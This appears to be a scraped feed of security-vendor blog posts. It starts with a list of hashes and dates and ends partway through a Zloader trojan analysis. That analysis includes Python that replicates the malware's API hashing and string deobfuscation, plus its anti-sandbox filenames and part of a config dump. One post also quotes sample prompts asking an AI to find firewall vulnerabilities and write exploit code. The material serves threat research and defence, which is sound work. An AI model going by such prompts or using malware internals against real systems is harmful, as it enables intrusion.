2e9261e75e15540ef88327a480a5b10e 2016-04-26 a472b9dd64198d739c6e415bbcae8a6f 2016-05-19 8609e6e4d01d9ef755832b326450cbe9 2016-06-01 a7cc19cde3a1a78b506410e4ffafdbef 2017-04-27 581016035f95327e7e1daac3ad55ae0e 2017-05-16 361d46f32a93786b34b2ac225efc0f79 2018-02-06 89e6f171c29255d6b4490774c630ad14 2019-09-16 ff186a1ef9e83c229940ff2dd4556eaf 2020-01-22 bea66da7088bd20adbfed57cf350a6a4 2020-01-22 1cd7a95064515625ad90464a65ea4d94 2020-03-03 08c51514a42eec6ccbbc7a09a8258419 2020-03-20 d8ff9d18cd622c545d21b199a2d17594 2020-04-01 2e658f5fa658651331cb5b16447bdbe2 2020-04-29 ca22283396dbe21fa2ef5e27c85ffae6 2020-05-07 e9d0e767a5c5284ab33a3bb80687cf63 2020-05-07 d8841201c9d32b5e885f4d035e32f654 2020-05-28 82d7c5ea49c97059bbec02161b36f468 2020-08-07 163ee88405bccc383c7b69c39028bf9a 2020-08-07 acf65632b7cdc40091daec58bf8830bc 2020-08-11 455c543243f5216e21ba045814311971 2020-08-11 cfc77e4421d830e73c6f6040a4baedd4 2020-11-03 40a9bdac882285ab844917d8b5b75188 2020-11-24 6b1771b883c0b3ffdc3f5923f45c1f93 2020-12-15 0a3caa2845251b8fb5ab72f450edd488 2021-03-12 4a6e7f055d5bf4fd6d2a401c1b3d18ab 2021-04-12 dc2acf1704456880208146c91692cfc8 2021-04-15 3ca1f0e708283f21c9a10ef4acf40990 2021-04-15 1e71ea79c5a70bb8c729037132855b5a 2021-04-22 66a87dbc24af866849646911f4841a28 2021-04-29 25984af48fa27ec36bd257f8478aa628 2021-04-29 c1849c1ee3b8146c6fb836dae0b64652 2021-05-06 d45e04df3c9270a01e9fb9e4e8006acc 2021-09-20 9a1c1497428743b4e199f2583f3d8390 2021-09-27 0865757dfe54c2d01c5cef5bfd3162c5 2021-09-27 c6dea1f4e6ee1ed4c0383cd1af456649 2021-11-03 1d4952cbe998312fd2bf810535db8a20 2021-11-03 6cce1ec83d1428de9fcb0c3791efabd1 2021-11-04 e111d982dc0c12f23fa3f446d674600b 2021-11-04 751f7d8ad6b2308cd1750fc23f606b53 2021-12-09 8bb4208a50c041f9cdfc26815905eab3 2022-02-10 bcb8e64c5a69c7a572ca34450712fb2f 2022-02-14 54e3f20f74c1089e89841798ffaac084 2022-02-14 95adeb6a1c1e0a9d9ee4ecafb6079b37 2022-02-15 da206d25fddf3286f42ec7626d8bb676 2022-02-18 3ba490216d4cdf92661444d896fefac3 2022-02-24 8fa26ff07c3b5e1653e55b8a567b7623 2022-02-24 1253695c63136edb1f6b37bbfd83db55 2022-04-06 2853985cab3c5b83eec38ae1f3a890be 2022-04-29 5e7deb4acb4429498693bc45db68978a 2022-05-04 2273dd59ca71c4f078cab09d93093294 2022-05-04 40d5e775a52c94842c97d012eb94efdc 2022-05-04 f1d47a4dc1d11b17e51419299dc282e4 2022-05-12 2f17bd9f4b9edd91a7fd80ef32981f70 2022-05-18 7dcbd74778754eee85810a4393d8e3ef 2022-05-18 e9e9d194f3ee9822852309cc83455eea 2022-05-23 019117f66e43de489b3ff56377f9907b 2022-05-24 28f84ffa14c7ef3936a00d3bd751bdb3 2022-06-07 d88ee89344d04f83eacd3614785560ef 2022-08-31 3ff9d9dbf8c7a6865faeb43188afa6b4 2022-09-06 3e86ac10b4e7d818e0f410130bb7f237 2022-09-08 377acb7149fdfa56c090d9a12619a53c 2022-09-15 e5ebdec7417ad847e4325c4114e41809 2022-09-20 c23d2cd7d10a5f88032ddfcab4cfe146 2022-09-28 050ce5fb25ffd3e907a5c81a6711fcea 2022-10-04 b857efb30d9e35bc83a294580ad8cc3a 2022-10-10 6dc027269262b93351633eb8af4623ef 2022-10-11 e5eb07b009ca666f91ef5fe48269ca52 2022-10-25 0971b8e78fcc6f9158e279376116c8c4 2022-10-26 4fbebc9879ec1f95e759cb8b5d9fb89d 2022-10-28 66a0741f8f43b584e387459b367097c1 2022-10-31 6d61a88890be4ab5116cb712ff7788f4 2022-11-08 da75924c717524a8d17de126f8368ec4 2022-11-08 5971c4a485e881268ca28f24fdedc4e5 2022-11-16 22e45a212998d2ee264b6756b2972901 2022-11-28 accc6d9ba88040c89df34ef1749944d1 2022-12-13 22b3cb9b0bacd525a83aab5b1a853f63 2022-12-20 bebebd4e16a88f43f16e4c6c811c9894 2022-12-20 cafb7b2f8383cf9686f144dc2082f287 2022-12-22 6e3b4252903c0f3a153e011445ad2179 2023-01-31 3e3bc981a7fdbae10b40cd6683edacbb 2023-01-31 a12dd4324bbf1129d9fae1b3d1e6b9ca 2023-05-02 ebec03d53d716cd780c92c5c29a95e6b 2023-05-10 5e4c95b2c1b14a8a0f425576189fae60 2023-12-11 8aec3f3ef66e4ff118bfdab1d031eadb 2023-12-13 46e169516479d0614b663f302b5d1ace 2023-12-19 795319d48ce1f680699beb03317c6bff 2024-01-22 de1d9ed6da4f34b4444b13442aac5033 2024-01-22 f382d0f92221831eeb39c108f8ccfa26 Wed, 31 Jan 2024 08:31:01 -0800 Javier Vicente AI Detections Across the Attack Chain Organizations face a constant barrage of cyberthreats. To combat these sophisticated attacks, Zscaler delivers layered security protections to deliver more effective security postures across the four key stages of an attack - attack surface discovery, compromise, lateral movement, and data exfiltration. Heading into 2024, with all the buzz surrounding artificial intelligence (AI) over the past year, we are asked daily by prospects and customers, "Zscaler, how do you use AI to keep us safer?" For more on where we see AI and security headed in 2024, please see the blog from our founder, Jay Chaudhry. In this blog, we will explore a handful of examples of Zscaler AI use across key stages of an attack—demonstrating how it can detect and stop threats, protect data, and make teams more efficient. Truth be told, we began to add AI detections into our portfolio some years ago to further bolster other detection methods, and it has paid off. Stage 1: Attack surface discovery While we will spend the better part of this blog discussing AI in other areas, the first stage of an attack involves attackers probing attack surfaces to identify potential weaknesses be exploited. These are often things like VPN/firewall misconfigurations or vulnerabilities, or unpatched servers. We wholeheartedly suggest considering ways to cloak your currently discoverable applications behind Zscaler to immediately reduce your attack surface and reduce your risk of successful attacks Stage 2: Risk of compromise During the compromise stage, attackers exploit vulnerabilities to gain unauthorized access to employee systems or applications. Zscaler's AI-powered products help reduce risk of compromise while prioritizing productivity. AI-powered phishing/C2 prevention: We better detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, ThreatLabz research, and dynamic browser isolation. This means our AI makes us even more efficient in detecting new phishing or C2 domains. File-based attacks: We use AI in our cloud sandbox to ensure there is no tradeoff between security and productivity. Historically, in the case of the sandbox, a new file arrives and users must wait as it is analyzed, interrupting productivity. Our AI Instant Verdict in the sandbox prevents patient zero infections by instantly blocking high-confidence malicious files using AI, eliminated the need to wait for analysis on file we feel are very likely malicious. Our model fidelity is a result of years of ongoing training, analysis, and tuning interactions based on over 550 million file samples. AI to block web threats: Additionally, Zscaler's AI-powered browser isolation blocks zero day threats while ensuring employees can access the right sites to get their jobs done. URL filtering is effective in keeping users safe, but given that sites are either allowed or blocked, sometimes sites that are blocked are safe and needed for work. This is a productivity drain as users cannot access legitimate sites for work, resulting in unnecessary helpdesk tickets. AI Smart Isolation determines when a site might be risky and open it in isolation. This means organizations don't have to overblock sites to support productivity and can also maintain a strong web security posture. Stage 3: Lateral movement Once inside an organization, attackers attempt to move laterally to gain access to sensitive data. Zscaler's AI innovation reduces potential blast radius by employing automated app segmentation based on analysis of user access patterns to limit lateral movement risk. For instance, if we see only 250 of 4,500 employees accessing a finance application, we will use this data to automatically create an app segment that limits access to only those 250 employees, thus reducing potential blast radius and lateral movement opportunity by ~94 percent. Stage 4: Data exfiltration The final stage of an attack involves the unauthorized exfiltration of sensitive data from a company. Zscaler uses AI to allow companies to deploy data protections faster to protect sensitive data. With AI-driven data discovery, organizations no longer struggle with the time-consuming task of data fingerprinting and classification that delays deployment. Innovative data discovery automatically finds and classifies all data out of the box. This means data is classified as sensitive information immediately, so it can be protected right away from potential exfiltration and data breaches Zscaler's AI-driven security products provide organizations with robust protection across the four key stages of an attack. We also rely on AI to deliver cybersecurity maturity assessments as part of our Risk360 cyber risk management product. Rest assured, we are busy thinking, building, and adding new AI capabilities every day, so there is more to come, as AI-powered security is becoming indispensable in safeguarding organizations against cyberthreats. Fri, 26 Jan 2024 08:00:01 -0800 Dan Gould Cloud Workloads: Cybersecurity Predictions for 2024 The year 2023 witnessed explosive transitions in the cloud security market, with every aspect of the ecosystem—vendors, products, and infrastructure—undergoing significant change. Looking ahead to 2024, cybersecurity for workloads (VMs, containers, services) in the public cloud will continue to evolve as customers continue to strike a balance between aggressive cloud adoption and compliance with corporate security needs. Within this, CIOs and CISOs will challenge their teams to build a security platform that consolidates point products, supports multiple clouds (AWS, Azure, and GCP), and automates to scale security operations. As a result, we will see zero trust architecture leading the way in securing cloud workloads, real-time data protection, and centralized policy enforcement. Here are the top 5 trends we believe will unfold in 2024. 1. Lateral threat movement into clouds from on-premises environments will increase The cloud is where organizations' most valuable assets—applications and data—are heading. Attackers are employing innovative techniques that involve compromising an organization's on-premises network and laterally moving to its cloud domain. These techniques are seeing increased popularity with threat actors as inconsistencies persist between on-premises and public cloud environments. An attack detailed by the Microsoft Security research team (source: MERCURY and DEV-1084: Destructive attack on hybrid environment) exemplifies this trend. The threat actors first compromised two privileged accounts, then leveraged them to manipulate the Azure Active Directory (Azure AD) Connect agent. Two weeks prior to deploying ransomware, the threat actors used a compromised, highly privileged account to gain access to the device where the Azure AD Connect agent was installed. We assess with high confidence that the threat actors then utilized the AADInternals tool to extract plaintext credentials of a privileged Azure AD account. These credentials were subsequently used to pivot from the targeted on-premises environment to the targeted Azure AD environment. Fig. On-premises compromise pivots to the public cloud 2. Serverless services will significantly widen the attack surface Serverless functions offer tremendous simplicity, allowing developers to focus solely on writing and deploying code without worrying about its underlying infrastructure. The adoption of microservices-based architectures will continue to drive the use of serverless functions due to their reusability as well as their ability to speed up application development. However, there is a significant security risk associated with serverless functions, as they interact with various input and event sources, often requiring HTTP or API calls to trigger actions. They also utilize cloud resources such as blob stores or block storage, employ queues to sequence interactions with other functions, and connect with devices. These touchpoints increase the attack surface, as many of them involve untrusted message formats and lack proper monitoring or auditing for standard application layer protection. Fig. Serverless functions can access the full stack of additional services, creating a wide attack surface 3. Identity-based security policies will be redefined as it pertains to public cloud protection As workloads start to mushroom in public clouds, each CSP will bring their own disparate identity capabilities. Unlike with users, there is no one ring (Active Directory) to rule them all. IT shops will continue to deal with disconnected identity profiles across on-premises, private cloud, and public cloud for workloads. That said, in 2024, security teams will continue to deal with multiple workload attributes to write their security policies, and higher level abstractions (like user defined tags) will start to gain wider adoption as such. This will drive consistency between cybersecurity and other resource management functions (billing, access controls, authentication, reporting) for cloud workloads. Fig. User Defined tags will be used to implement zero trust architecture to secure workloads in the cloud 4. Enterprises will evaluate and deploy cloud-delivered security platforms that support multiple public clouds Staffing people and building architectures specialized to secure each public cloud will place the onus on security teams to seek out the solutions that work best for them. Enterprises will evaluate tools from CSPs such as cloud firewall point solutions, but will increasingly look for architectures that can centralize their cloud security policy definitions, enforcements, and remediations. Only when cyber prevention is delivered from one central platform can cyber defense be applied to all workloads—not just a few selective ones. 5. CIOs' willingness to hedge their bets across AWS, Azure, and GCP will dictate the implementation of security tools that can span multiclouds. When it comes to vendor best practices, CIOs are looking to diversify their cloud infrastructure portfolios. Doing so allows them to reduce reliance on a single vendor, integrate infrastructure inherited from mergers and acquisitions, and leverage best of breed services from different public clouds such as Google Cloud BigQuery for data analytics, AWS for mobile apps, and Oracle Cloud for ERP. Fig. AWS shared responsibility framework for protecting cloud resources. [SOURCE] Every cloud vendor preaches the notion of “shared responsibility” when it comes to cybersecurity, placing the onus on the customer to implement a security infrastructure for their cloud resources. Savvy IT shops will ensure that they pick a cybersecurity platform that can support multiple public cloud environments. Customers can’t possibly entertain the idea of separate security tools for each public cloud—rather, they will standardize on one platform for all their needs. Deploying workloads in the public cloud is not a new trend in the corporate world, but the topic of cloud workload security continues to get hotter and hotter. While there are no clear answers yet, there are a few indications that customers will navigate towards in 2024. Namely, zero trust, as it provides immediate benefit in the near-term and a solid framework for cloud workload security into the future. Want to learn more about zero trust for cloud workloads? Click here for more Zscaler perspectives. This blog is part of a series of blogs that provide forward-facing statements into access and security in 2024. The next blog in this series covers Zero Trust predictions. Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law. Thu, 25 Jan 2024 08:00:02 -0800 Sakthi Chandra Zscaler Academy: Reflecting on 2023 and Soaring into 2024 2023 was a year of transformation and innovation for Zscaler Academy. We reimagined cybersecurity education, tailoring it to the evolving landscape of zero trust security. As we begin 2024, it's time to reflect on what we've achieved and show you what's on the horizon 2023: Building the Pillars of Zero Trust Learning New Training and Offerings: We revamped our curriculum, introducing the Zscaler for Users learning path and specializations in Data Protection, Cyberthreat Protection, and Workloads. Hands-on labs, live virtual training, and engaging workshops became the norm, bridging the gap between theory and practice. New Approach: We embraced a learner-centric approach, catering to diverse learning styles and preferences. Self-paced e-learning, interactive webinars, and immersive workshops offered flexibility and depth, empowering individuals at all levels. Certification: We evolved our certification program, aligning it with the latest zero trust advancements, and introduced an industry-standard third-party proctored certification exam. The Zscaler Digital Transformation Administrator (ZDTA) certification exam is the final step in the Zscaler for Users - Essentials learning path, and supports the journey of any security professional to validate their understanding of deploying and implementing the Zscaler Zero Trust Exchange platform. Roadshows and Virtual Training: We took Zscaler Academy on the road, hosting virtual and in-person events like Zscaler Training Roadshows and Virtual Training workshops around the globe. These interactive sessions fostered connections, knowledge sharing, and a sense of community among Zscaler users and partners A Year of Bridging the Cybersecurity Skills Gap Customers: We empowered customers to maximize the value of their Zscaler investments. Our training equipped administrators, security professionals, and end users with the skills to confidently navigate the Zero Trust Exchange. Partners: We supported our partners in their growth journey. The Partner Academy provided the knowledge and expertise needed to build successful Zscaler practices and deliver exceptional customer service. Workforce of the Future: We invested in the future by inspiring and equipping the next generation of cybersecurity professionals. Our initiatives are contributing to closing the cybersecurity skills gap, ensuring a talent pool prepared for the zero trust era through the Zscaler Academic Alliance Program. The New Charter Era: What Awaits in 2024 Micro-Learning and Micro-Credentials: We're embracing bite-sized learning, offering micro-credentials for specific skills. This agile approach will allow you to stay ahead of the curve and acquire targeted knowledge on the go. New Certifications: We'll be expanding our certification portfolio, introducing new paths that validate expertise in specific Zscaler solutions and emerging security domains. More Training Courses and Events: We'll continue to diversify our offerings, adding new training courses (like Ransomware Protection, Deception, Troubleshooting, and more), live workshops, and virtual events. Expect deeper dives into specific technologies, industry trends, and best practices. Personalized Learning: We're committed to personalization, utilizing data and insights to tailor learning recommendations and experiences to your individual needs and goals The Future Is Zero Trust, and Zscaler Academy Is Your Guide As we step into 2024, Zscaler Academy remains your trusted partner on your zero trust journey. We'll continue to innovate, adapt, and empower you with the knowledge and skills to thrive in the dynamic security landscape. Stay tuned for exciting announcements and updates! We're dedicated to making Zscaler Academy the leading destination for zero trust education, ensuring you're always prepared to secure your future in the age of zero trust. Join us in 2024! Let's keep learning, growing, and building a safer digital world together Wed, 24 Jan 2024 08:00:01 -0800 Prameet Chhabra Navigating the Intersection of Cybersecurity and AI: Key Predictions for 2024 This article also appeared in VentureBeat. Anticipating the future is a complex endeavor, however, I'm here to offer insights into potential trends that could shape the ever-evolving cybersecurity landscape in 2024. We engage with over 40% of Fortune 500 companies and I personally have conversations with thousands of CXOs each year which provides me a unique view into the possibilities that might impact the security landscape. Let's explore these potential trends and see what the future of cybersecurity might look like. 1. Generative AI will increase ransomware attacks: The utilization of GenAI technologies will expedite the identification of vulnerable targets, enabling cybercriminals to launch ransomware attacks with greater ease and sophistication. Before, when launching a cyberattack, hackers had to spend time to identify an organization's attack surface and potential vulnerabilities that can be exploited in internet-facing applications and services. However, with the advent of LLMs, the landscape has dramatically shifted. Now, a hacker can simply ask a straightforward question like, "Show me vulnerabilities for all firewalls for [a given organization] in a table format.” And the next command could be, “Build me exploit code for this firewall," and the task at hand becomes significantly easier. GenAI can also help identify vulnerabilities among your supply chain partners and optimal paths that are connected to your network. It's important to recognize that even if you strengthen your own estate, vulnerabilities may still exist through other entry points, potentially making them the easiest targets for attacks. The combination of social engineering exploits and GenAI technology will result in a surge of cyber breaches, characterized by enhanced quality, diversity, and quantity. This will create a feedback loop that facilitates iterative improvements, making these breaches even more sophisticated and challenging to mitigate. Defense Strategy: Using the Zscaler Zero Trust Exchange, customers can make their applications invisible to potential attackers, reducing the attack surface. If you can’t be reached, you can’t be breached. 2. AI will be used to fight AI: We will be witnessing a promising development where AI is being harnessed by security providers to combat the ever-evolving nature of AI-driven attacks. Enterprises generate a vast amount of logs containing signals that could indicate potential attacks. However, isolating these signals in a timely manner has been challenging due to signal-to-noise issues. With the advent of GenAI technologies, we now have the capability to identify potential avenues of attack more effectively. By leveraging GenAI, we can enhance triage and protection measures by understanding which vulnerabilities hackers are likely to exploit. Additionally, this technology enables us to detect attackers and exploits in near real-time. As a result, cloud security providers will develop AI-powered tools to proactively prevent potential areas of exploitation. In addition, with the advent of AI and ML tools, we have the capability to predict and identify potential vulnerabilities in an organization that are likely to be exploited. This will help reduce cyber breaches. Defense Strategy: Zscaler is building tools such as breach predictors that could predict and prevent breaches powered by communication logs. Before any breach happens there is always reconnaissance activity. Because Zscaler sits in the middle of all communications, we have visibility into potential threats. This allows us to understand if a hacker has infiltrated an enterprise, and if so, suggest steps to prevent a breach. 3. The rise of firewall-free enterprises: Organizations are coming to a realization that despite significant investments in firewalls and VPNs, their security posture remains vulnerable. They are understanding that a true Zero Trust architecture has to be implemented. Realizing the inherent security risks and false sense of security provided by firewall-based approaches, customers will move away from Firewall and VPN as their main security technology. Over the next few years, firewalls will become archaic like mainframes. Organizations are awakening to the need for a more comprehensive and effective cybersecurity strategy. The coming years will witness the significant acceleration in the adoption and implementation of Zero Trust architecture and the rise of "firewall-free enterprises.” This transformative shift represents a crucial inflection point in the cybersecurity landscape. Defense Strategy: This shift reflects a changing approach to cybersecurity, driven by the understanding that a firewall-centric approach is ineffective in safeguarding against evolving threats, prompting customers to seek true Zscaler Zero Trust solutions. 4. Broader adoption of Zero Trust segmentation: The number one cause of ransomware attacks is a flat network. Once hackers are on the network, they can easily move laterally and find high-value assets and encrypt them and ask for ransom. Organizations have been trying to implement network-based segmentation to eliminate lateral movement. I have talked to hundreds of CISOs but have yet to meet one who has successfully completed network-based segmentation or microsegmentation. It is too cumbersome to implement and operationalize. In 2023, hundreds of enterprises successfully implemented the initial phase of Zero Trust architecture. Moving into 2024, we anticipate a broader adoption of Zero Trust-based segmentation. This approach simplifies implementation so you don’t need to create network segments and you use Zero Trust technology to connect a certain group of applications to a certain group of applications. Defense Strategy: Zscaler offers Zero Trust segmentation in two areas: User-to-application segmentation Application-to-application segmentation 5. Zero Trust SD-WAN will start to replace traditional SD-WAN: SD-WAN has helped enterprises save money by using the internet—a cheaper transport. But SD-WANs have not improved security, as they allow lateral threat movement. Zero Trust SD-WAN doesn’t put users on the network, it simply makes a point-to-point connection between users and applications, hence eliminating lateral threat movement. This protects enterprises from ransomware attacks. Zero Trust SD-WAN will emerge as an important technology to provide highly reliable, highly secure and seamless connectivity. Zero Trust SD-WAN also reduces the overhead as enterprises no longer have to worry about managing route tables. Zero Trust SD-WAN makes every branch office like an internet cafe or a coffee shop, your employees can access any application without having to extend your network to every branch office. Defense Strategy: Zscaler offers a Zero Trust SD-WAN solution that is easy to implement with a Plug-n-Play appliance. 6. SEC regulations will drive far more active participation of Board members and CFOs for cyber risk reduction: Recognizing the damage that cyber breaches could cause to businesses, these key stakeholders will more actively engage in cybersecurity initiatives and decision-making processes. The increased involvement of CFOs and Boards of Directors in cybersecurity underscores the recognition that it is not solely a CIO or CISO’s responsibility, but a vital element of overall organizational resilience and risk management. Newly introduced SEC disclosure requirements will serve as a catalyst for boards to become more engaged in driving cybersecurity initiatives in their companies. More companies will require at least one board member with a strong background in cybersecurity. Defense Strategy: Through Zscaler Risk360, we provide a holistic risk score for an organization which highlights the contributing factors to your cyber risk and compares your risk score with your peers with trends over time. In addition, Zscaler has added SEC disclosure reports generated by GenAI, leveraging contributing factors that have been used to compute your company's risk score. Mon, 22 Jan 2024 15:31:59 -0800 Jay Chaudhry Bringing Zero Trust to Branches Over the past five years, the tech industry has undergone significant transformation. Among the myriad changes in how organizations approach technology to gain a competitive edge, three primary shifts have had profound impacts: Migration of apps from traditional data centers to the cloud (the rise of SaaS) Hybrid workforce models, where employees operate from both regional offices and remote locations Proliferation of IoT/OT devices in factories and branch offices Many enterprises are finding that limitations in their WAN infrastructure and gaps in network security impede their ability to deal with these three shifts. Traditional SD-WANs expand the attack surface and allow lateral threat movement. They connect various sites through site-to-site VPNs or routed overlays, establishing implicit trust that grants unrestricted access to critical business resources, even for compromised entities. Moreover, coarse-grained segmentation policies allow threats to move easily within the network. With the rising number of threats and the adoption of IoT/OT devices, which are often invisible to the network, organizations need to ensure their WAN infrastructure adheres to zero trust principles. Traditional WAN infrastructure consists of multiple point products such as routers, firewalls, and VPNs, which can add up to substantial management challenges. Hence, organizations undertaking branch transformation need a solution that follows a “thin branch, thick cloud” model to reduce management complexities. Zscaler Zero Trust SD-WAN securely connects branches, factories, and data centers without the complexity of VPNs, ensuring zero trust access for users, IoT/OT devices, and servers. Using Zero Trust SD-WAN, enterprises can build a thin branch that eliminates unnecessary devices with a simple plug-and-play appliance that can be deployed using only an internet connection. Figure 1: Traditional SD-WAN vs. Zero Trust SD-WAN Zero Trust SD-WAN eliminates business risk Unlike traditional SD-WANs that extend the network to remote sites, clouds, and third parties, Zero Trust SD-WAN connects users, IoT/OT devices, and applications to resources they are entitled to access, without using routed overlays. This creates a zero trust network that eliminates the attack surface and prevents lateral threat movement. Since all traffic is proxied through Zscaler Zero Trust Exchange, there are no publicly exposed IP addresses or VPN ports for hackers to compromise. A recent Zscaler ThreatLabz report revealed a 400% increase in IoT and OT-based malware attacks since 2022, underscoring the need for organizations to have greater visibility and security around IoT/OT devices deployed in their networks. Often overlooked and invisible, IoT/OT is not adequately addressed when administrators design security policies for branch users, but as the ThreatLabz report shows, these devices represent a significant threat vector. Zero Trust SD-WAN provides complete device visibility, giving organizations a detailed view of all their IoT/OT devices as well as insights into the applications with which they communicate. Moreover, administrators no longer need separate policies for users and devices since the same policies can be applied consistently to both. Figure 2: IoT device discovery and classification Many organizations have server-to-client communication use cases. For instance, a print server in a data center may need to issue a print command to a remote printer in branch location. With Zero Trust SD-WAN, organizations don’t have to worry about exposed service ports that a hacker could exploit to breach the network. All branch communication is proxied through Zero Trust Exchange, which stitches the connection between the print server and the remote printer. Extending zero trust security to all entities, such as users, IoT/OT devices, and servers, enhances overall security. Zero Trust SD-WAN replaces site-to-site VPNs Traditional SD-WANs connect sites (e.g., branches, factories, data centers) using IPsec VPN tunnels. Routed overlays allow any device to communicate with any other device, server, or app, ensuring reachability between users, devices, and apps—reachability that hackers can exploit to easily access other resources in the network. With Zero Trust SD-WAN, branch traffic is forwarded directly to the Zero Trust Exchange, where Zscaler Internet Access (ZIA) or Zscaler Private Access (ZPA) policies can be applied for full security inspection and identity-based access control. Zero Trust SD-WAN dramatically simplifies branch communication with a zero trust network overlay that allows for flexible forwarding and simple policy management. Figure 3: Site-to-site VPN replacement Zero Trust SD-WAN simplifies mergers and acquisitions Combining two separate businesses into one entity can provide enhanced efficiency, increased market presence, and other advantages. However, integrating new systems and routing domains into the existing environment can be a slow, painful process that takes many months to complete. With Zscaler, the entire M&A integration process can be far simpler and faster. Zero Trust SD-WAN communicates only to the Zero Trust Exchange, eliminating the need to merge routing domains between existing and acquired sites. By deploying Zero Trust SD-WAN at an acquired site, enterprises can steer traffic to Zero Trust Exchange, which brokers the connection from the other end for secure communication. This results in successful day-one operation and onboarding of new sites in a matter of just weeks, or even days. Figure 4: M&A integration How does this all work? Apps defined in the ZPA portal are assigned a synthetic IP address. Once a user initiates a connection to the new app using the synthetic IP, Zero Trust SD-WAN at that branch site sends traffic to the Zero Trust Exchange. In the acquired site, where the app is hosted, the App Connector (built into Zero Trust SD-WAN) initiates an inside-out connection to the Zero Trust Exchange. The Zero Trust Exchange brokers the connection from the user to the app. Conclusion Organizations need a networking solution that protects them from today’s growing cyberthreats, but traditional SD-WANs increase security risk and networking complexity. In contrast, Zero Trust SD-WAN brings zero trust principles to WANs by securely connecting users, IoT/OT devices, and servers. To enhance the security of branches, factories, and data centers, organizations must transition from traditional flat networks with implicit trust to zero trust networks. Adopting Zero Trust SD-WAN offers numerous benefits, such as mitigating cyber risk, lowering cost and complexity, enhancing business agility, and implementing a single-vendor SASE solution. For more information, please visit the Zscaler Zero Trust SD-WAN webpage. Mon, 22 Jan 2024 17:50:01 -0800 Karan Dagar Zloader: No Longer Silent in the Night Introduction Zloader (aka Terdot, DELoader, or Silent Night), is a modular trojan born from the leaked Zeus source code. It surfaced publicly in 2016 during a targeted campaign against German banks1, but its malicious activity traces back to at least August 2015. Zloader’s first run persisted until the beginning of 2018 when its activities abruptly ceased. Its resurgence at the end of 2019, marketed in underground forums as “Silent Night”, came with substantial alterations. The evolution of Zloader progressed steadily, leading to the development of version around September 2021. Similar to Qakbot, the threat actors using Zloader also pivoted from conducting banking fraud to ransomware. In April 2022, security researchers executed a takedown operation2 to dismantle the botnet leading to an extended period of inactivity. After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and the loader now has native support for 64-bit versions of Windows. Initially, this new version was labeled with the old version number However, over the past several months, they released version and In this blog, we will explore these new updates to Zloader. Key Takeaways Zloader dates back to 2015 and has been advertised in underground cybercriminal forums under the name “Silent Night” since the end of 2019. Zloader has returned after an almost two-year hiatus after being taken down in April 2022 by security researchers. The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time. Zloader continues to use junk code for obfuscation, as well as API import hashing and string encryption in an attempt to hinder malware analysis. Technical AnalysisIn the following sections, we dive into the technical details surrounding Zloader’s new updates to their anti-analysis techniques, embedded configuration, DGA, and network encryption.Anti-analysis techniquesZloader uses a combination of API import hashing, junk code, a filename check, and string obfuscation. The following sections analyze each technique.Imports and API resolutionThe newest Zloader samples only import a few functions from the kernel32 library. The remaining imports are resolved at runtime using checksums to obfuscate the functions that are used. This technique, already present in older versions, changes its implementation, adding an XOR constant which changes between samples. Python code that replicates the API hashing algorithm is shown below.def calculate_checksum(func_name, xor_constant): checksum = 0 for element in func_name.upper(): checksum = 16 * checksum - (0 - (ord(element)+1)) if checksum & 0xf0000000 != 0: checksum = ((((checksum & 0xf0000000) >> 24) ^ checksum) & 0xfffffff) return checksum ^ xor_constantCode sample available on GitHub.Junk code Similar to previous versions, Zloader uses custom obfuscation. The new version of Zloader adds junk code that consists of various arithmetic operations, as shown in Figure 1 below.Figure 1. Example Zloader 2.1 junk codeIn Figure 1, the instructions inside the red box are the junk code.Anti-sandboxEach Zloader sample expects to be executed with a specific filename. If the filename does not match what the sample expects, it will not execute further. This could evade malware sandboxes that rename sample files. Figure 2 shows an example of a Zloader sample that expects its filename to be CodeForge.exe.Figure 2. Example of Zloader’s anti-analysis filename checkThreatLabz has observed Zloader use the following filenames:CodeForge.exeCyberMesh.exeEpsilonApp.exeFusionBeacon.exeFusionEcho.exeIonBeacon.dllIonPulse.exeKineticaSurge.dllQuantumDraw.exeSpectraKinetic.exeUltraApp.exeString obfuscationSimilar to prior versions, Zloader implements a string obfuscation algorithm for some of the malware’s important strings such as registry paths, DLL names, and the DGA’s top-level domain (TLD) using XOR with a hardcoded key. Python code that replicates the string obfuscation algorithm is shown below:def str_deobfuscate(enc_bin, enc_key): res = '' for i, element in enumerate(enc_bin): res += chr( ((element ^ 0xff) & (enc_key[i % len(enc_key)])) | (~(enc_key[i % len(enc_key)]) & element)) return res Code sample available on GitHub. The encryption key differs between samples and is also hardcoded in the .rdata section as shown in Figure 3 below.Figure 3. Example string obfuscation key used by ZloaderA list of Zloader’s obfuscated strings is shown in the Appendix.Static configuration encryption and structureThe Zloader static configuration is still encrypted using RC4 with a hardcoded alphanumeric key, but the structure is slightly different. The botnet ID, campaign name, and command-and-control servers (C2s) are set at fixed offsets, in addition to an RSA public key that replaces the old RC4 key that was used for network encryption. ThreatLabz has observed 15 unique new Zloader samples and all of them have the same RSA public key, likely indicating there is currently only a single threat actor using the malware.An example Zloader static configuration is shown below.00000000 00 00 00 00 42 69 6e 67 5f 4d 6f 64 35 00 00 00 |....Bing_Mod5...| 00000010 00 